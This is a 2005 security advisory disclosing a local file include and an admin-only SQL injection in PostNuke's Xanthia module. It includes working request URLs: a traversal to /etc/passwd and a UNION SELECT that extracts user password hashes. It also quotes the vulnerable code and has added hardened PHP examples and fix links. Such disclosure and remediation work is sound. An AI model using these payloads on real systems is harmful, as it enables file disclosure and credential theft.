
postnukeSQL0760rc3.txt

Posted Aug 14, 2005
Authored by Maksymilian Arciemowicz

PostNuke versions 0.760RC3 and below are vulnerable to SQL injection.

tags | exploit, sql injection
SHA-256 | d3af81e0fc22d49f4eaec7866a406567c5653a2db0e52361ec350a5075b14188



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10]

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 2.4.2005
from securityreason.com TEAM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.760-RC3=>X)

PostNuke is an open source, open development content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Non Critical Local files include ---
This error exists in modules/Xanthia/pnadminapi.php. You can read any file on the server if PHP is badly configured and you have admin rights.

For example:

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3
etc.

Error message :
- ---------------
/www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053
- ---------------

or

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE]

but you can set the skin variable to the path of another file. Example for /etc/passwd:

http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../../../../../../etc/passwd%00


Vulnerable code in modules/Xanthia/pnadminapi.php:

- ---1039-1052---
$cWhereIsPerso = WHERE_IS_PERSO;
if (!(empty($cWhereIsPerso))) {
    $xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
    $xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php';
}
else {
    $xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
    $xaninit_path = 'themes/'.$id.'/xaninit.php';
}
if (file_exists($xaninitlang_path)) {
    include_once($xaninitlang_path);
}

include_once($xaninit_path);
- ---1039-1052---
etc.
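
A hardened form of the path construction above, as an added example that is not part of the original advisory or of PostNuke. The function name, its parameters and the temporary demo directory are assumptions made for illustration.

```php
<?php
/**
 * Added example (not PostNuke code): resolve a theme's xaninit.php only when
 * the theme id and language are plain directory names inside $themesRoot.
 * Function and parameter names are hypothetical.
 */
function xanthia_safe_init_path($themesRoot, $id, $langs = null)
{
    // Allow-list: one path segment of letters, digits, '_' or '-'. This
    // rejects '/', '..' and NUL bytes such as the trailing %00.
    $segments = $langs === null ? array($id) : array($id, $langs);
    foreach ($segments as $segment) {
        if (!is_string($segment) || !preg_match('/\A[A-Za-z0-9_-]+\z/', $segment)) {
            return false;
        }
    }
    $relative = $langs === null
        ? "$id/xaninit.php"
        : "$id/lang/$langs/xaninit.php";

    // Canonicalise and confirm the result is still under the themes directory
    // (covers symlinks, which the allow-list cannot see).
    $root = realpath($themesRoot);
    $path = realpath($themesRoot . '/' . $relative);
    if ($root === false || $path === false) {
        return false;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return false;
    }
    return $path;
}

// Constructed demo: a temporary themes directory holding one theme.
$root = sys_get_temp_dir() . '/xanthia_demo_' . getmypid();
mkdir("$root/PiterpanV2", 0700, true);
file_put_contents("$root/PiterpanV2/xaninit.php", "<?php\n");

// Constructed inputs: a valid theme name, a traversal value, a NUL-terminated value.
foreach (array('PiterpanV2', '../../../../etc/passwd', "PiterpanV2\0") as $skin) {
    $resolved = xanthia_safe_init_path($root, $skin);
    printf("%-28s => %s\n", addcslashes($skin, "\0"), $resolved === false ? 'rejected' : 'accepted');
}

// Remove the demo files again.
unlink("$root/PiterpanV2/xaninit.php");
rmdir("$root/PiterpanV2");
rmdir($root);
```

Only a path returned by the function would be passed to include_once; a false return means the request is refused.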

- --- 2. Non critical Sql Injection ---
This SQL injection is non-critical because it works only with admin rights.

- -1655-1676---
$sql="SELECT $column[module] as module,
             $column[block] as block,
             $column[position] as position
      FROM $pntable[theme_blcontrol]
      WHERE $column[position]='$dati[0]'
      ORDER BY $column[module]";

$result =& $dbconn->Execute($sql);
if(!$result->EOF) {
    // Create output object - this object will store all of our output so that
    // we can return it easily when required
    $pnRender =& new pnRender('Xanthia');

    // As Admin output changes often, we do not want caching.
    $pnRender->caching = false;

    $pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu'));
    $pnRender->assign('warn', _XA_NZWARNING);
    $pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE),
                                             pnVarPrepForDisplay(_XA_BLOCK)));
    while(!$result->EOF) {
        $row = $result->GetRowAssoc(false);
- -1655-1676---

So for a successful attack we first need to log in as a PostNuke administrator.
Once we are administrator we can go to:

Example:

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3&riga[1]=and&riga[2]=sp3x&skin=PiterpanV2

Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676
- ---------------

Exploit for admin:
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/*
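
The lookup from the excerpt above with the position value bound as a parameter instead of concatenated into the SQL string. This is an added example, not PostNuke code: it assumes PDO with the SQLite driver, and the table and column names are constructed stand-ins for $pntable[theme_blcontrol] and $column[...].

```php
<?php
// Added example, not PostNuke code. Constructed in-memory table standing in
// for $pntable[theme_blcontrol]; column names stand in for $column[...].
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE theme_blcontrol (module TEXT, block TEXT, position TEXT)');
$db->exec("INSERT INTO theme_blcontrol VALUES ('News', 'menu', 'left')");

/**
 * Hypothetical replacement for the concatenated query: the position value
 * travels as a bound parameter and is never part of the SQL text.
 */
function blocks_for_position(PDO $db, $position)
{
    // Request parameters can also arrive as arrays; accept strings only.
    if (!is_string($position)) {
        return array();
    }
    $stmt = $db->prepare(
        'SELECT module, block, position
           FROM theme_blcontrol
          WHERE position = ?
          ORDER BY module'
    );
    $stmt->execute(array($position));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a legitimate position, and the quote-bearing test value
// from the advisory's error-triggering request. The second is compared as a
// literal string, so the statement stays well-formed.
foreach (array('left', "'cXIb8O3") as $value) {
    $rows = blocks_for_position($db, $value);
    printf("%-12s => %d row(s)\n", $value, count($rows));
}
```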

- --- 3. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

- --- 4. Greets ---

sp3x

- --- 5.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCju1CznmvyJCR4zQRAp43AJ4q5/3+dxSvWStOt3r839UGAqZwmQCfUeX9
FPuUJYFwC8xSOTg8ws0eSWY=
=pg2k
-----END PGP SIGNATURE-----